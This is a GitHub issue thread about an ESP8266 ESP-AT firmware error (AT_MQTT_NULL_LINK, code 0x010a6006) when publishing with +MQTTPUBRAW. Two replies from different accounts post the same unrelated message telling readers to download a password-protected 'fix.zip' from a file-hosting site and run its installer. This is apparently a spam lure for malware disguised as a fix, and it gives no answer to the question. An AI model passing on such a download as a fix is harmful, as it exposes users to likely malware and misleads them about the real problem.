espressif/esp-at #867: esp8266发送+MQTTPUBRAW时出现错误码`AT_MQTT_NULL_LINK`是什么原因

MoonShadowIllusion, 2024-08-26:
### Answers checklist.

- [X] I have read the documentation [ESP-AT Programming Guide](https://docs.espressif.com/projects/esp-at/en/latest/) and the issue is not addressed there.
- [X] I have used the latest released firmware or have updated my ESP-AT branch (master or release) to the latest version and checked that the issue is present there.
- [X] I have searched the issue tracker for a similar issue and not found a similar issue.

### General issue report

使用 `+MQTTPUBRAW`

esttemanb, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

MoonShadowIllusion, 2024-08-26:
错误码是 `ERR CODE:0x010a6006`

Wanderx13, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."